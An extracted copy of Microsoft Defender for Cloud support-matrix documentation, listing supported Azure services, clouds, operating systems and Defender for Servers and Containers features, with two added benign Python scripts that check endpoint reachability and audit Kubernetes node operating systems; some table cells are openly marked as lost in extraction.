e Set security policies in Defender for Cloud 

e Manage security recommendations in Defender for Cloud 

e Manage and respond to security alerts in Defender for Cloud 
e Monitor partner security solutions 


Support matrices for Defender for 
Cloud 


Article e 05/15/2023 


This article describes Azure services and client operating systems that are supported by 
Microsoft Defender for Cloud. For Azure cloud support, review this article 


Security benefits for Azure services 


Defender for Cloud provides recommendations, security alerts, and vulnerability 


assessment for these Azure services: 


Service | Recommendations free with Foundational CSPM | Security alerts | Vulnerability assessment
Azure App Service | ✓ | ✓ | -
Azure Automation account | ✓ | - | -
Azure Batch account | ✓ | - | -
Azure Blob Storage | ✓ | ✓ | -
Azure Cache for Redis | ✓ | - | -
Azure Cloud Services | ✓ | - | -
Azure Cognitive Search | ✓ | - | -
Azure Container Registry | ✓ | ✓ | Defender for Containers
Azure Cosmos DB* | ✓ | ✓ | -
Azure Data Lake Analytics | ✓ | - | -
Azure Data Lake Storage | ✓ | ✓ | -
Azure Database for MySQL* | - | ✓ | -
Azure Database for PostgreSQL* | - | ✓ | -
Azure Event Hubs namespace | ✓ | - | -
Azure Files | ✓ | ✓ | -
Azure Functions app | ✓ | ✓ | -
Azure Key Vault | ✓ | ✓ | -
Azure Kubernetes Service | ✓ | ✓ | -
Azure Load Balancer | ✓ | - | -
Azure Logic Apps | ✓ | - | -
Azure SQL Database | ✓ | ✓ | Defender for Azure SQL
Azure SQL Managed Instance | ✓ | ✓ | Defender for Azure SQL
Azure Service Bus namespace | ✓ | - | -
Azure Service Fabric account | ✓ | - | -
Azure Stream Analytics | ✓ | - | -
Azure Subscription | ✓ ** | ✓ | -
Azure Virtual Network (incl. subnets, NICs, and network security groups) | ✓ | - | -

* These features are currently supported in preview.

** Azure Active Directory (Azure AD) recommendations are available only for subscriptions with enhanced security features enabled.


Supported operating systems 


Defender for Cloud depends on the Azure Monitor Agent or the Log Analytics agent. Make sure that your machines are running one of the supported operating systems as described on the following pages:

• Azure Monitor Agent
  ◦ Azure Monitor Agent for Windows supported operating systems
  ◦ Azure Monitor Agent for Linux supported operating systems
• Log Analytics agent
  ◦ Log Analytics agent for Windows supported operating systems
  ◦ Log Analytics agent for Linux supported operating systems

Also ensure your Log Analytics agent is properly configured to send data to Defender for Cloud.

To learn more about the specific Defender for Cloud features available on Windows and Linux, review:

• Defender for Servers support
• Defender for Containers support

Note

Even though Microsoft Defender for Servers is designed to protect servers, most of its features are supported for Windows 10 machines. One feature that isn't currently supported is Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint.


Next steps 


This article explained how Microsoft Defender for Cloud is supported in the Azure, Azure 
Government, and Azure China 21Vianet clouds. Now that you're familiar with the 
Defender for Cloud capabilities supported in your cloud, learn how to: 


• Manage security recommendations in Defender for Cloud
• Manage and respond to security alerts in Defender for Cloud


Defender for Cloud support for Azure commercial/other clouds


Article • 10/20/2023


This article indicates which Defender for Cloud features are supported in Azure commercial and government clouds.


Cloud support 


In the support table, NA indicates that the feature isn't available. 


Feature/Plan | Azure | Azure Government | Microsoft Azure operated by 21Vianet
GENERAL FEATURES | | |
Continuous data export | GA | GA | GA
Response automation with Azure Logic Apps | GA | GA | GA
Security alerts (generated when one or more Defender for Cloud plans is enabled) | GA | GA | GA
Alert email notifications | GA | GA | GA
Alert suppression rules | GA | GA | GA
Alert bi-directional synchronization with Microsoft Sentinel | Preview | NA | NA
Azure Workbooks integration for reporting | GA | GA | GA
Automatic component/agent/extension provisioning | GA | GA | GA
FOUNDATIONAL CSPM FEATURES (FREE) | | |
Asset inventory | GA | GA | GA
Security recommendations based on the Microsoft Cloud Security Benchmark | GA | GA | GA
Recommendation exemptions | Preview | NA | NA
Secure score | GA | GA | GA
DevOps security posture | Preview | NA | NA
DEFENDER FOR CLOUD PLANS | | |
Defender CSPM | GA | NA | NA
Defender for APIs (review support preview regions) | Preview | NA | NA
Defender for App Service | GA | NA | NA
Defender for Azure Cosmos DB | GA | NA | NA
Defender for Azure SQL database servers | GA | GA | GA
Defender for Containers (review detailed feature support) | GA | GA | GA. A subset of alerts/vulnerability assessments is available. Behavioral threat protection isn't available.
Defender for DevOps | Preview | NA | NA
Defender for DNS | GA | GA | GA
Defender for Key Vault | GA | NA | NA
Defender for Open-Source Relational Databases | GA | NA | NA
Defender for Resource Manager | GA | GA | GA
Defender for Servers (review detailed feature support) | GA | GA | GA
Defender for Storage | GA | GA (activity monitoring) | NA
Defender for SQL Servers on Machines | GA | GA | NA

Important

As of August 1, customers with an existing subscription to Defender for DNS can continue to use the service, but new subscribers will receive alerts about suspicious DNS activity as part of Defender for Servers P2.


Next steps 


Start reading about Defender for Cloud features. 


Defender for Servers support 


Article • 06/11/2023


This article summarizes support information for the Defender for Servers plan in 
Microsoft Defender for Cloud. 


Network requirements 


Validate that the following endpoints are configured for outbound access so that the Azure Arc extension can connect to Microsoft Defender for Cloud to send security data and events:

• For Defender for Servers multicloud deployments, make sure that the addresses and ports required by Azure Arc are open.
• For deployments with GCP connectors, open port 443 to these URLs:
  ◦ osconfig.googleapis.com
  ◦ compute.googleapis.com
  ◦ containeranalysis.googleapis.com
  ◦ agentonboarding.defenderforservers.security.azure.com
  ◦ gbl.his.arc.azure.com
• For deployments with AWS connectors, open port 443 to these URLs:
  ◦ ssm.<region>.amazonaws.com
  ◦ ssmmessages.<region>.amazonaws.com
  ◦ ec2messages.<region>.amazonaws.com
  ◦ gbl.his.arc.azure.com
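As an added example (not code from the Microsoft documentation), the following Python script checks outbound HTTPS reachability to the endpoints listed above by completing a TLS handshake on port 443 rather than a bare TCP connect, so an intercepting proxy with an untrusted certificate is reported as a failure; the AWS region value and the 5-second timeout are assumptions.

```python
"""Check outbound HTTPS reachability for the Defender for Servers
multicloud connector endpoints listed above.

Added example, not Microsoft's code. The region used in the usage section
and the connection timeout are assumptions."""
import socket
import ssl
from dataclasses import dataclass
from typing import List, Optional

HTTPS_PORT = 443

# Endpoints for GCP connectors, as listed in the network requirements above.
GCP_ENDPOINTS = [
    "osconfig.googleapis.com",
    "compute.googleapis.com",
    "containeranalysis.googleapis.com",
    "agentonboarding.defenderforservers.security.azure.com",
    "gbl.his.arc.azure.com",
]

# Endpoints for AWS connectors; <region> is the placeholder used above.
AWS_ENDPOINT_TEMPLATES = [
    "ssm.<region>.amazonaws.com",
    "ssmmessages.<region>.amazonaws.com",
    "ec2messages.<region>.amazonaws.com",
    "gbl.his.arc.azure.com",
]


@dataclass
class EndpointResult:
    host: str
    port: int
    reachable: bool
    detail: str


def required_endpoints(connector: str, region: Optional[str] = None) -> List[str]:
    """Return the hostnames a connector of the given type must reach.

    AWS hostnames are regional, so the caller must supply the region of the
    connected account (for example "us-east-1")."""
    if connector == "gcp":
        return list(GCP_ENDPOINTS)
    if connector == "aws":
        if not region:
            raise ValueError("AWS endpoints are regional; a region is required")
        return [h.replace("<region>", region) for h in AWS_ENDPOINT_TEMPLATES]
    raise ValueError(f"unknown connector type: {connector!r}")


def check_endpoint(host: str, port: int = HTTPS_PORT, timeout: float = 5.0) -> EndpointResult:
    """Open a TCP connection and complete a TLS handshake with the endpoint.

    A bare TCP connect is not sufficient: an intercepting proxy that answers
    on 443 but presents an untrusted certificate would pass a socket test yet
    still break the Arc extension, so the handshake uses the system trust
    store with hostname verification enabled."""
    context = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with context.wrap_socket(raw, server_hostname=host) as tls:
                return EndpointResult(host, port, True, f"TLS handshake ok ({tls.version()})")
    except (OSError, ssl.SSLError) as exc:
        # OSError covers DNS failure, refused/blocked connections and timeouts;
        # SSLError covers certificate problems such as an intercepting proxy.
        return EndpointResult(host, port, False, f"{type(exc).__name__}: {exc}")


def check_connector(connector: str, region: Optional[str] = None,
                    timeout: float = 5.0) -> List[EndpointResult]:
    """Check every endpoint required by one connector type."""
    return [check_endpoint(h, timeout=timeout) for h in required_endpoints(connector, region)]


if __name__ == "__main__":
    # Assumed region; replace with the region of the connected AWS account.
    results = check_connector("aws", region="us-east-1") + check_connector("gcp")
    for r in results:
        status = "OK  " if r.reachable else "FAIL"
        print(f"{status} {r.host}:{r.port}  {r.detail}")
    raise SystemExit(1 if any(not r.reachable for r in results) else 0)
```

Run it from the machine (or network segment) that will host the Arc extension, since firewall and proxy rules differ per segment.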


Azure cloud support 


This table summarizes Azure cloud support for Defender for Servers features. 


Feature/Plan | Azure | Azure Government | Azure China 21Vianet
Microsoft Defender for Endpoint integration | GA | GA | NA
Compliance standards (compliance standards might differ depending on the cloud type) | GA | GA | GA
Microsoft Cloud Security Benchmark recommendations for OS hardening | GA | GA | GA
VM vulnerability scanning - agentless | GA | NA | NA
VM vulnerability scanning - Microsoft Defender for Endpoint sensor | GA | NA | NA
VM vulnerability scanning - Qualys | GA | NA | NA
Just-in-time VM access | GA | GA | GA
File integrity monitoring | GA | GA | GA
Adaptive application controls | GA | GA | GA
Adaptive network hardening | GA | NA | NA
Docker host hardening | GA | GA | GA


The following table shows feature support for Windows machines in Azure, Azure Arc, and other clouds.

Feature | *Azure VMs, VM Scale Sets (Flexible orchestration) | Azure Arc-enabled machines | Defender for Servers required
Microsoft Defender for Endpoint integration | ✔ (on supported versions) | | Yes
Virtual machine behavioral analytics (and security alerts) | ✔ | | Yes
Fileless security alerts | ✔ | | Yes
Network-based security alerts | ✔ | | Yes
Just-in-time VM access | ✔ | | Yes
Integrated Qualys vulnerability scanner | ✔ | | Yes
File Integrity Monitoring | ✔ | ✔ | Yes
Adaptive application controls | ✔ | ✔ | Yes
Network map | ✔ | - | Yes
Adaptive network hardening | ✔ | - | Yes
Regulatory compliance dashboard & reports | ✔ | ✔ | Yes
Docker host hardening | - | - | Yes
Missing OS patches assessment | ✔ | ✔ | Azure: No; Azure Arc-enabled: Yes
Security misconfigurations assessment | ✔ | ✔ | Azure: No; Azure Arc-enabled: Yes
Endpoint protection assessment | ✔ | ✔ | Azure: No; Azure Arc-enabled: Yes
Disk encryption assessment | ✔ (for supported scenarios) | - | No
Third-party vulnerability assessment (BYOL) | ✔ | - | No
Network security assessment | ✔ | - | No

(The Azure Arc-enabled machines values for the first six rows did not survive extraction and are left blank.)


Linux machine support 


The following table shows feature support for Linux machines in Azure, Azure Arc, and other clouds.

Feature | Azure VMs, VM Scale Sets (Flexible orchestration) | Azure Arc-enabled machines | Defender for Servers required
Microsoft Defender for Endpoint integration | | | Yes
Virtual machine behavioral analytics (and security alerts) | | | Yes
Fileless security alerts | | | Yes
Network-based security alerts | | | Yes
Just-in-time VM access | | | Yes
Integrated Qualys vulnerability scanner | | | Yes
File Integrity Monitoring | | | Yes
Adaptive application controls | | | Yes
Network map | | | Yes
Adaptive network hardening | | | Yes
Regulatory compliance dashboard & reports | | | Yes
Docker host hardening | | | Yes
Missing OS patches assessment | | | Azure: No; Azure Arc-enabled: Yes
Security misconfigurations assessment | | | Azure: No; Azure Arc-enabled: Yes
Endpoint protection assessment | | | No
Disk encryption assessment | | | No
Third-party vulnerability assessment (BYOL) | | | No
Network security assessment | ✔ | | No

(Only the Defender for Servers required column survived extraction intact for this table. Four ✔ marks from the Azure VMs column, one qualified "(on supported versions)" and one "(for supported scenarios)", and the Azure Arc-enabled column could not be assigned to rows and are left blank.)


The following table shows feature support for AWS and GCP machines.

Feature | Availability in AWS | Availability in GCP
Microsoft Defender for Endpoint integration | |
Virtual machine behavioral analytics (and security alerts) | |
Fileless security alerts | |
Network-based security alerts | |
Just-in-time VM access | |
Integrated Qualys vulnerability scanner | |
File Integrity Monitoring | |
Adaptive application controls | |
Network map | |
Adaptive network hardening | |
Regulatory compliance dashboard & reports | |
Docker host hardening | |
Missing OS patches assessment | |
Security misconfigurations assessment | |
Endpoint protection assessment | |
Disk encryption assessment | |
Third-party vulnerability assessment | |
Network security assessment | - | -
Cloud security explorer | ✔ | -

(For the rows above Network security assessment, four ✔ marks per cloud survived extraction, one of them "(for supported scenarios)", but not their row positions; those cells are left blank.)


Endpoint protection support 


The following table provides a matrix of supported endpoint protection solutions. The table indicates whether you can use Defender for Cloud to install each solution for you.

Solution | Supported platforms | Defender for Cloud installation
Microsoft Defender Antivirus | Windows Server 2016 or later | No (built into OS)
System Center Endpoint Protection (Microsoft Antimalware) | Windows Server 2012 R2 | Via extension
Trend Micro — Deep Security | Windows Server (all) | No
Symantec v12.1.1100+ | Windows Server (all) | No
McAfee v10+ | Windows Server (all) | No
McAfee v10+ | Linux (GA) | No
Microsoft Defender for Endpoint for Linux¹ | Linux (GA) | Via extension
Microsoft Defender for Endpoint Unified Solution² | Windows Server 2012 R2 and Windows 2016 | Via extension
Sophos V9+ | Linux (GA) | No

¹ It's not enough to have Microsoft Defender for Endpoint on the Linux machine: the machine will only appear as healthy if the always-on scanning feature (also known as real-time protection (RTP)) is active. By default, the RTP feature is disabled to avoid clashes with other AV software.

² With the MDE unified solution on Server 2012 R2, it automatically installs Microsoft Defender Antivirus in Active mode. For Windows Server 2016, Microsoft Defender Antivirus is built into the OS.


Next steps 


Start planning your Defender for Servers deployment. 


Defender for Containers support 


Article • 09/06/2023 
This article summarizes support information for the Defender for Containers plan in Microsoft 
Defender for Cloud. 

Note

Specific features are in preview. The Azure Preview Supplemental Terms include other legal terms that apply to Azure features that are in beta, preview, or otherwise not yet released into general availability.


Azure (AKS) 


Feature | Supported Resources | Linux release state | Windows release state | Agentless/Agent-based | Pricing Tier | Azure clouds availability
Agentless discovery for Kubernetes | ACR, AKS | GA | GA | Agentless | Defender for Containers or Defender CSPM | Azure commercial clouds
Compliance - Docker CIS | VM, Virtual Machine Scale Set | GA | - | Log Analytics agent | Defender for Servers Plan 2 | Commercial clouds; National clouds: Azure Government, Microsoft Azure operated by 21Vianet
Vulnerability assessment (powered by Qualys) - registry scan OS packages | ACR, Private ACR | GA | Preview | Agentless | Defender for Containers | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet
Vulnerability assessment (powered by Qualys) - registry scan language packages | ACR, Private ACR | Preview | - | Agentless | Defender for Containers | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet
Vulnerability assessment (powered by Qualys) - running images | AKS | GA | Preview | Defender agent | Defender for Containers | Commercial clouds
Vulnerability assessment powered by MDVM - registry scan | ACR, Private ACR | Preview | - | Agentless | Defender for Containers | Commercial clouds
Vulnerability assessment powered by MDVM - running images | AKS | Preview | - | Defender agent | Defender for Containers | Commercial clouds
Hardening (control plane) | ACR, AKS | GA | Preview | Agentless | Free | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet
Hardening (Kubernetes data plane) | AKS | GA | - | Azure Policy | Free | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet
Runtime threat detection (control plane) | AKS | GA | GA | Agentless | Defender for Containers | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet
Runtime threat detection (workload) | AKS | GA | - | Defender agent | Defender for Containers | Commercial clouds
Discovery/provisioning - Unprotected clusters | AKS | GA | GA | Agentless | Free | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet
Discovery/provisioning - Collecting control plane threat data | AKS | GA | GA | Agentless | Defender for Containers | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet
Discovery/provisioning - Defender agent auto provisioning | AKS | GA | - | Agentless | Defender for Containers | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet
Discovery/provisioning - Azure Policy for Kubernetes auto provisioning | AKS | GA | - | Agentless | Free | Commercial clouds; National clouds: Azure Government, Azure operated by 21Vianet


Registries and images support for Azure - powered by Qualys 


Registries and images
  Supported:
  • ACR registries protected with Azure Private Link (private registries require access to Trusted Services)
  • Windows images using Windows OS version 1709 and above (Preview). This is free while it's in preview, and will incur charges (based on the Defender for Containers plan) when it becomes generally available.
  Unsupported:
  • Super-minimalist images such as Docker scratch images
  • "Distroless" images that only contain an application and its runtime dependencies without a package manager, shell, or OS
  • Images with Open Container Initiative (OCI) Image Format Specification
  • Providing image tag information for multi-architecture images is currently unsupported

OS Packages
  Supported:
  • Alpine Linux 3.12-3.16
  • Red Hat Enterprise Linux 6, 7, 8
  • CentOS 6, 7
  • Oracle Linux 6, 7, 8
  • Amazon Linux 1, 2
  • openSUSE Leap 42, 15
  • SUSE Enterprise Linux 11, 12, 15
  • Debian GNU/Linux wheezy, jessie, stretch, buster, bullseye
  • Ubuntu 10.10-22.04
  • FreeBSD 11.1-13.1
  • Fedora 32, 33, 34, 35

Language specific packages (Preview) (only supported for Linux images)
  Supported:
  • Python
  • Node.js
  • .NET
  • Java
  • Go


Registries and images for Azure - powered by MDVM 


Registries and images
  Supported:
  • ACR registries
  • ACR registries protected with Azure Private Link (private registries require access to Trusted Services)
  • Container images in Docker V2 format
  Unsupported:
  • Super-minimalist images such as Docker scratch images
  • "Distroless" images that only contain an application and its runtime dependencies without a package manager, shell, or OS
  • … is currently unsupported
  • Images with Open Container Initiative (OCI) image format specification
  • Windows images

OS Packages
  Supported:
  • Alpine Linux 3.12-3.16
  • Red Hat Enterprise Linux 6-9
  • CentOS 6-9
  • Oracle Linux 6-9
  • Amazon Linux 1, 2
  • openSUSE Leap, openSUSE Tumbleweed
  • SUSE Enterprise Linux 11-15
  • Debian GNU/Linux 7-12
  • Ubuntu 12.04-22.04
  • Fedora 31-37
  • Mariner 1-2

Language specific packages
  Supported:
  • Python
  • Node.js
  • .NET
  • Java
  • Go


Kubernetes distributions and configurations - Azure 


Kubernetes distributions and configurations
  Supported:
  • Azure Kubernetes Service (AKS) with Kubernetes RBAC
  Supported via Arc-enabled Kubernetes¹ ²:
  • Azure Kubernetes Service hybrid
  • Kubernetes
  • AKS Engine
  • Azure Red Hat OpenShift

¹ Any Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters should be supported, but only the specified clusters have been tested on Azure.

² To get Microsoft Defender for Containers protection for your environments, you need to onboard Azure Arc-enabled Kubernetes and enable Defender for Containers as an Arc extension.


Note

For additional requirements for Kubernetes workload protection, see existing limitations.


Private link restrictions


Defender for Containers relies on the Defender agent for several features. The Defender agent doesn't support the ability to ingest data through Private Link. You can disable public access for ingestion, so that only machines that are configured to send traffic through Azure Monitor Private Link can send data to that workspace. You can configure a private link by navigating to your workspace > Network Isolation and setting the Virtual networks access configurations to No.

[Screenshot: Virtual networks access configuration, with the option "Accept queries from public networks not connected through a Private Link Scope" set to Yes or No]

Allowing data ingestion to occur only through Private Link Scope on your workspace Network Isolation settings can result in communication failures and partial coverage of the Defender for Containers feature set.

Learn how to use Azure Private Link to connect networks to Azure Monitor.


AWS (EKS) 


Domain | Feature | Supported Resources | Linux release state | Windows release state | Agentless/Agent-based | Pricing tier
Compliance | Docker CIS | EC2 | Preview | - | Log Analytics agent | Defender for Servers Plan 2
Vulnerability Assessment | Registry scan | ECR | Preview | - | Agentless | Defender for Containers
Vulnerability Assessment | View vulnerabilities for running images | - | - | - | - | -
Hardening | Control plane recommendations | - | - | - | - | -
Hardening | Kubernetes data plane recommendations | EKS | Preview | - | Azure Policy for Kubernetes | Defender for Containers
Runtime protection | Threat detection (control plane) | EKS | Preview | Preview | Agentless | Defender for Containers
Runtime protection | Threat detection (workload) | EKS | Preview | - | Defender agent | Defender for Containers
Discovery and provisioning | Discovery of unprotected clusters | EKS | Preview | - | Agentless | Free
Discovery and provisioning | Collection of control plane threat data | EKS | Preview | Preview | Agentless | Defender for Containers
Discovery and provisioning | Auto provisioning of Defender agent | - | - | - | - | -
Discovery and provisioning | Auto provisioning of Azure Policy for Kubernetes | - | - | - | - | -


Images support - AWS 


Registries and images
  Unsupported:
  • Images that have at least one layer over 2 GB
  • Public repositories and manifest lists
  • Images in the AWS management account aren't scanned so that we don't create resources in the management account.


Kubernetes distributions/configurations support - AWS 


Kubernetes distributions and configurations
  Supported:
  • Amazon Elastic Kubernetes Service (EKS)
  Supported via Arc-enabled Kubernetes¹ ²:
  • Kubernetes

¹ Any Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters should be supported, but only the specified clusters have been tested.

² To get Microsoft Defender for Containers protection for your environments, you need to onboard Azure Arc-enabled Kubernetes and enable Defender for Containers as an Arc extension.


Note

For additional requirements for Kubernetes workload protection, see existing limitations.


Private link restrictions


Defender for Containers relies on the Defender agent for several features. The Defender agent doesn't support the ability to ingest data through Private Link. You can disable public access for ingestion, so that only machines that are configured to send traffic through Azure Monitor Private Link can send data to that workspace. You can configure a private link by navigating to your workspace > Network Isolation and setting the Virtual networks access configurations to No.

[Screenshot: Virtual networks access configuration, showing the options "Accept data ingestion from public networks not connected through a Private Link Scope" and "Accept queries from public networks not connected through a Private Link Scope", each set to Yes or No]

Allowing data ingestion to occur only through Private Link Scope on your workspace Network Isolation settings can result in communication failures and partial coverage of the Defender for Containers feature set.

Learn how to use Azure Private Link to connect networks to Azure Monitor.


Outbound proxy support


Outbound proxy without authentication and outbound proxy with basic authentication are supported. Outbound proxy that expects trusted certificates is currently not supported.


GCP (GKE) 


Domain | Feature | Supported Resources | Linux release state | Windows release state | Agentless/Agent-based | Pricing tier
Compliance | Docker CIS | GCP VMs | Preview | - | Log Analytics agent | Defender for Servers Plan 2
Vulnerability Assessment | Registry scan | - | - | - | - | -
Vulnerability Assessment | View vulnerabilities for running images | - | - | - | - | -
Hardening | Control plane recommendations | GKE | GA | GA | Agentless | Free
Hardening | Kubernetes data plane recommendations | GKE | Preview | - | Azure Policy for Kubernetes | Defender for Containers
Runtime protection | Threat detection (control plane) | GKE | Preview | Preview | Agentless | Defender for Containers
Runtime protection | Threat detection (workload) | GKE | Preview | - | Defender agent | Defender for Containers
Discovery and provisioning | Discovery of unprotected clusters | GKE | Preview | - | Agentless | Free
Discovery and provisioning | Collection of control plane threat data | GKE | Preview | Preview | Agentless | Defender for Containers
Discovery and provisioning | Auto provisioning of Defender agent | GKE | Preview | - | Agentless | Defender for Containers
Discovery and provisioning | Auto provisioning of Azure Policy for Kubernetes | GKE | Preview | - | Agentless | Defender for Containers


Kubernetes distributions/configurations support - GCP


Kubernetes distributions and configurations
  Supported:
  • Google Kubernetes Engine (GKE) Standard
  Supported via Arc-enabled Kubernetes¹ ²:
  • Kubernetes
  Unsupported:
  • Private network clusters
  • GKE autopilot
  • GKE AuthorizedNetworksConfig


¹ Any Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters should be supported, but only the specified clusters have been tested.

² To get Microsoft Defender for Containers protection for your environments, you need to onboard Azure Arc-enabled Kubernetes and enable Defender for Containers as an Arc extension.


Note

For additional requirements for Kubernetes workload protection, see existing limitations.


Private link restrictions 


Defender for Containers relies on the Defender agent for several features. The Defender agent doesn't support the ability to ingest data through Private Link. You can disable public access for ingestion, so that only machines that are configured to send traffic through Azure Monitor Private Link can send data to that workspace. You can configure a private link by navigating to your workspace > Network Isolation and setting the Virtual networks access configurations to No.

[Screenshot: Virtual networks access configuration, showing the options "Accept data ingestion from public networks not connected through a Private Link Scope" and "Accept queries from public networks not connected through a Private Link Scope", each set to Yes or No]

Allowing data ingestion to occur only through Private Link Scope on your workspace Network Isolation settings can result in communication failures and partial coverage of the Defender for Containers feature set.

Learn how to use Azure Private Link to connect networks to Azure Monitor.


Outbound proxy support


Outbound proxy without authentication and outbound proxy with basic authentication are supported. Outbound proxy that expects trusted certificates is currently not supported.


On-premises, Arc-enabled Kubernetes clusters 


Domain | Feature | Supported Resources | Linux release state | Windows release state | Agentless/Agent-based | Pricing tier
Compliance | Docker CIS | Arc enabled VMs | Preview | - | Log Analytics agent | Defender for Servers Plan 2
Vulnerability Assessment | Registry scan - OS packages | ACR, Private ACR | | | |
Vulnerability Assessment | Registry scan - language specific packages | ACR, Private ACR | | | |
Vulnerability Assessment | View vulnerabilities for running images | | | | |
Hardening | Control plane recommendations | | | | |
Hardening | Kubernetes data plane recommendations | | | | |
Runtime protection | Threat detection (control plane) | | | | |
Runtime protection for supported OS | Threat detection (workload) | | | | |
Discovery and provisioning | Discovery of unprotected clusters | | | | |
Discovery and provisioning | Collection of control plane threat data | | | | |
Discovery and provisioning | Auto provisioning of Defender agent | | | | |
Discovery and provisioning | Auto provisioning of Azure Policy for Kubernetes | | | | |

(The remaining cells of this table were dropped from this copy of the document. Five "Preview" release-state values and a pricing column consisting of "Defender for Containers" entries with a single "Free" survived without their row positions, so they are not placed here.)


Registries and images support - on-premises


Registries and images
  Supported:
  • ACR registries protected with Azure Private Link (private registries require access to Trusted Services)
  • Windows images using Windows OS version 1709 and above (Preview). This is free while it's in preview, and will incur charges (based on the Defender for Containers plan) when it becomes generally available.
  Unsupported:
  • Super-minimalist images such as Docker scratch images
  • "Distroless" images that only contain an application and its runtime dependencies without a package manager, shell, or OS
  • Images with Open Container Initiative (OCI) Image Format Specification
  • Providing image tag information for multi-architecture images is currently unsupported

OS Packages
  Supported:
  • Alpine Linux 3.12-3.15
  • Red Hat Enterprise Linux 6, 7, 8
  • CentOS 6, 7
  • Oracle Linux 6, 7, 8
  • Amazon Linux 1, 2
  • openSUSE Leap 42, 15
  • SUSE Enterprise Linux 11, 12, 15
  • Debian GNU/Linux wheezy, jessie, stretch, buster, bullseye
  • Ubuntu 10.10-22.04
  • FreeBSD 11.1-13.1
  • Fedora 32, 33, 34, 35

Language specific packages (Preview) (only supported for Linux images)
  Supported:
  • Python
  • Node.js
  • .NET
  • Java
  • Go


Kubernetes distributions and configurations 


Kubernetes distributions and configurations
  Supported via Arc-enabled Kubernetes¹ ²:
  • Azure Kubernetes Service hybrid
  • Kubernetes
  • AKS Engine
  • Azure Red Hat OpenShift
  • Red Hat OpenShift (version 4.6 or newer)
  • VMware Tanzu Kubernetes Grid
  • Rancher Kubernetes Engine

¹ Any Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters should be supported, but only the specified clusters have been tested.

² To get Microsoft Defender for Containers protection for your environments, you need to onboard Azure Arc-enabled Kubernetes and enable Defender for Containers as an Arc extension.


Note

For additional requirements for Kubernetes workload protection, see existing limitations.


Supported host operating systems 


Defender for Containers relies on the Defender agent for several features. The Defender agent is supported on the following host operating systems:

• Amazon Linux 2
• CentOS 8
• Debian 10
• Debian 11
• Google Container-Optimized OS
• Mariner 1.0
• Mariner 2.0
• Red Hat Enterprise Linux 8
• Ubuntu 16.04
• Ubuntu 18.04
• Ubuntu 20.04
• Ubuntu 22.04

Ensure your Kubernetes nodes are running one of the verified supported operating systems. Clusters with different host operating systems only get partial coverage.
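To check this before onboarding a cluster, the following Python script (an added example, not part of the Microsoft documentation) matches each node's status.nodeInfo.osImage from `kubectl get nodes -o json` against the list above and reports nodes that would only get partial coverage; the osImage string formats and the sample node data are assumptions constructed for illustration.

```python
"""Audit Kubernetes nodes against the Defender agent's supported host
operating systems listed above.

Added example, not part of the Microsoft documentation. Input is the JSON
printed by `kubectl get nodes -o json`; the node data below is constructed
for illustration, and the osImage string formats are assumptions."""
import json
import re
from typing import Dict, List, Optional

# Supported host operating systems from the list above, as regular
# expressions matched against status.nodeInfo.osImage. Mariner nodes commonly
# report only "CBL-Mariner/Linux" in osImage, so the 1.0 / 2.0 distinction has
# to be confirmed separately (for example from the node's kernelVersion).
SUPPORTED_OS_PATTERNS: Dict[str, str] = {
    r"^Amazon Linux 2\b": "Amazon Linux 2",
    r"^CentOS (Linux|Stream) 8\b": "CentOS 8",
    r"^Debian GNU/Linux 10\b": "Debian 10",
    r"^Debian GNU/Linux 11\b": "Debian 11",
    r"^Container-Optimized OS\b": "Google Container-Optimized OS",
    r"^(CBL-)?Mariner\b": "Mariner 1.0 / 2.0",
    r"^Red Hat Enterprise Linux 8\b": "Red Hat Enterprise Linux 8",
    r"^Ubuntu 16\.04\b": "Ubuntu 16.04",
    r"^Ubuntu 18\.04\b": "Ubuntu 18.04",
    r"^Ubuntu 20\.04\b": "Ubuntu 20.04",
    r"^Ubuntu 22\.04\b": "Ubuntu 22.04",
}


def classify_os_image(os_image: str) -> Optional[str]:
    """Return the supported OS that os_image matches, or None."""
    for pattern, name in SUPPORTED_OS_PATTERNS.items():
        if re.match(pattern, os_image):
            return name
    return None


def audit_nodes(nodes_json: str) -> List[dict]:
    """Classify every node in a `kubectl get nodes -o json` document."""
    report = []
    for item in json.loads(nodes_json).get("items", []):
        info = item.get("status", {}).get("nodeInfo", {})
        os_image = info.get("osImage", "")
        # The supported list above is Linux-only, so a Windows node pool never
        # gets Defender agent coverage regardless of its osImage string.
        matched = classify_os_image(os_image) if info.get("operatingSystem") == "linux" else None
        report.append({
            "node": item["metadata"]["name"],
            "osImage": os_image,
            "supported": matched is not None,
            "matched": matched,
        })
    return report


def unsupported_nodes(nodes_json: str) -> List[str]:
    """Names of nodes that would only get partial coverage."""
    return [r["node"] for r in audit_nodes(nodes_json) if not r["supported"]]


# Constructed sample in the shape of `kubectl get nodes -o json` (trimmed).
SAMPLE_NODES_JSON = json.dumps({"items": [
    {"metadata": {"name": "aks-system-000000"},
     "status": {"nodeInfo": {"operatingSystem": "linux", "osImage": "Ubuntu 22.04.3 LTS"}}},
    {"metadata": {"name": "aks-mariner-000001"},
     "status": {"nodeInfo": {"operatingSystem": "linux", "osImage": "CBL-Mariner/Linux"}}},
    {"metadata": {"name": "aks-gpu-000002"},
     "status": {"nodeInfo": {"operatingSystem": "linux", "osImage": "Ubuntu 23.04"}}},
    {"metadata": {"name": "akswin000000"},
     "status": {"nodeInfo": {"operatingSystem": "windows", "osImage": "Windows Server 2022 Datacenter"}}},
]})

if __name__ == "__main__":
    for row in audit_nodes(SAMPLE_NODES_JSON):
        flag = "ok     " if row["supported"] else "PARTIAL"
        print(f"{flag} {row['node']:<22} {row['osImage']}")
```

Against a live cluster, pipe `kubectl get nodes -o json` into `audit_nodes` instead of the constructed sample.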


Network restrictions 


Private link 


